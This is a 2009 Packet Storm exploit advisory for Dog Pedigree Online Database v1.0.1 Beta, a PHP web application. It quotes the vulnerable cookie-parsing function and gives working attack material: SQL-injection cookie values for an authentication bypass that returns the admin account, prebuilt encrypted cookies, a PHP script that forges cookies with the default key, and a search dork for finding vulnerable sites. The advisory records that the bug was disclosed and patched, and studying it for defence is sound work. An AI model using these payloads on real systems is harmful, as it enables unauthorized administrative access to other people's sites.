Dog Pedigree Online Database Insecure Cookie

2009-05-20T00:00:00
ID PACKETSTORM:77657
Type packetstorm
Reporter YEnH4ckEr
Modified 2009-05-20T00:00:00

Description

                                        
                                            `---------------------------------------------------------------------------------------  
INSECURE COOKIE HANDLING VULNERABILITIES --Dog Pedigree Online Database v1.0.1-Beta-->  
---------------------------------------------------------------------------------------  
  
CMS INFORMATION:  
  
-->WEB: http://thewhippetarchives.net/twa_is_offline.php  
-->DOWNLOAD: http://sourceforge.net/projects/dogarchive  
-->DEMO: N/A  
-->CATEGORY: Genealogy  
-->DESCRIPTION: This project allows to setup and maintain a database for  
collecting (dog) pedigrees. The data will actually be collected...  
-->RELEASED: 2009-01-25  
  
CMS VULNERABILITY:  
  
-->TESTED ON: firefox 3  
-->DORK: inurl:"printable_pedigree.php"  
-->CATEGORY: COOKIE AUTH-BYPASS (SQLi) / INSECURE COOKIE HANDLING  
-->AFFECT VERSION: <= 1.0.1 Beta  
-->Discovered Bug date: 2009-05-08  
-->Reported Bug date: 2009-05-08  
-->Fixed bug date: 2009-05-12  
-->Info patch (v1.0.2): http://sourceforge.net/projects/dogarchive/  
-->Author: YEnH4ckEr  
-->mail: y3nh4ck3r[at]gmail[dot]com  
-->WEB/BLOG: N/A  
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.  
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)  
  
  
  
#######  
///////  
  
INTRO:  
  
///////  
#######  
  
  
Cookie name --> it could be configured, but any web change it.  
  
Cookie protection --> Active by default, but some Webs use it and other neither (Because it needs php_mcrypt extension).  
  
With cookie protection --> Any web change the $COOKIE_KEY value. Always by default  
  
  
  
###########################  
///////////////////////////  
  
COOKIE AUTH-BYPASS (SQLi):  
  
///////////////////////////  
###########################  
  
  
-----------  
VULN FILE:  
-----------  
  
  
Path --> [HOME_PATH]/php_users/htdocs/  
File --> users.php.inc  
Vuln function --> init()  
  
  
function init() {  
  
...  
  
$cookie = $_COOKIE[$USER_COOKIE];  
if (isset($COOKIE_KEY)) {  
$iv = mcrypt_create_iv(mcrypt_get_iv_size (MCRYPT_BLOWFISH, MCRYPT_MODE_ECB), MCRYPT_RAND);  
$cookie = mcrypt_decrypt(MCRYPT_BLOWFISH, $COOKIE_KEY, base64_decode($cookie), MCRYPT_MODE_ECB, $iv);  
}  
$cookie = rtrim($cookie);   
$a = split('&', $cookie);  
$i = 0;  
while ($i < count($a)) {  
$b = split ('=', $a[$i]);  
$key = urldecode($b[0]);  
$value = urldecode($b[1]);  
$this->{$key} = $value;  
$i++;  
}  
$this->id = $this->{'uid'};  
}  
  
..  
  
---------  
EXPLOIT:  
---------  
  
  
1.-WITHOUT ENCRYPTION:  
  
  
Add cookie --> Name ~> dogarchive_user_info  
  
--> Value ~> email=&uid=-1%20or%201=1#&seclev=  
  
  
2.-WITH ENCRYPTION:  
  
  
Add cookie --> Name ~> dogarchive_user_info  
  
--> Value ~> Ffq9xizFlqX%2FLFytv2XsUILuolhabq3%2BN5A0%2B3ifmNdjLEIqh%2BKIXA%3D%3D  
  
  
  
Return --> Admin account.  
  
  
##########################  
//////////////////////////  
  
INSECURE COOKIE HANDLING:  
  
//////////////////////////  
##########################  
  
  
<<<<-------+++++++++ Condition: Search e-mail and uid (it's not difficult) ++++++++++--------->>>>  
  
  
------  
NOTE:  
------  
  
  
Use an cookie builder (need php_mcrypt extension)   
to encrypt the cookie value:  
  
<?php  
  
//Configure [real_email] and [real_uid] with your target  
  
$COOKIE_KEY="somethingRAndoM9871234whateveryoulike"; //user.conf by default  
$cookie="email=".urlencode('[real_email]')."&uid=[real_uid]&seclev=1";  
$iv = mcrypt_create_iv(mcrypt_get_iv_size (MCRYPT_BLOWFISH, MCRYPT_MODE_ECB), MCRYPT_RAND);  
$cookie = base64_encode(mcrypt_encrypt (MCRYPT_BLOWFISH, $COOKIE_KEY, $cookie, MCRYPT_MODE_ECB, $iv));  
print "Cookie crypted-urlencode -->".urlencode($cookie)."\n";  
  
?>  
  
  
-----  
PoC:  
-----  
  
  
1.-WITHOUT ENCRYPTION:  
  
  
Add cookie --> Name ~> dogarchive_user_info  
  
--> Value ~> email=[real_email]&uid=[real_uid]&seclev=1  
  
  
2.-WITH ENCRYPTION:  
  
  
Add cookie --> Name ~> dogarchive_user_info  
  
--> Value ~> Use PHP script above  
  
  
---------  
EXPLOIT:  
---------  
  
  
1.-WITHOUT ENCRYPTION:  
  
  
Add cookie --> Name ~> dogarchive_user_info  
  
--> Value ~> email=y3nh4ck3r@gmail.com&uid=2422&seclev=1  
  
  
2.-WITH ENCRYPTION:  
  
  
Add cookie --> Name ~> dogarchive_user_info  
  
--> Value ~> 7O%2By0gnSt4KItondpdwQThDciQY6aR3QfFGEvZQzUGQWNkYwIUI4lfiZ1WQgnEc%2B  
  
  
  
#######################################################################  
#######################################################################  
##*******************************************************************##  
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray ... ##  
##*******************************************************************##  
##-------------------------------------------------------------------##  
##*******************************************************************##  
## GREETZ TO: SPANISH H4ck3Rs community! ##  
##*******************************************************************##  
#######################################################################  
#######################################################################  
`